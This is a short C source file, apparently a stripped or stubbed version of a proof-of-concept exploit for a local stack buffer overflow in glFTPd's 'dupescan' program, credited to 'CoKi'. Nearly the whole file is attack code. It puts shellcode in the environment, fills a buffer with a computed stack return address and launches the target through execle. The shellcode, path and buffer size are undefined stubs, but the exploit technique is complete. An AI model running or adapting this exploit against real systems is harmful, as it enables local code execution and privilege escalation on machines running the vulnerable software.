
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int BUFFER ;
 char* PATH ;
 int execle (char*,char*,char*,int *,char**) ;
 int printf (char*) ;
 char* shellcode ;
 int strlen (char*) ;

int main(void) {

char *env[3] = {shellcode, ((void*)0)};
char buf[BUFFER], *path;
int *buffer = (int *) (buf);
int i;
int ret = 0xbffffffa - strlen(shellcode) - strlen(PATH);

for(i=0; i<=BUFFER; i+=4)
*buffer++ = ret;

printf(" glFTPd local stack buffer overflow (Proof of Concept) ");
printf(" by CoKi ");

execle(PATH, "dupescan", buf, ((void*)0), env);
}
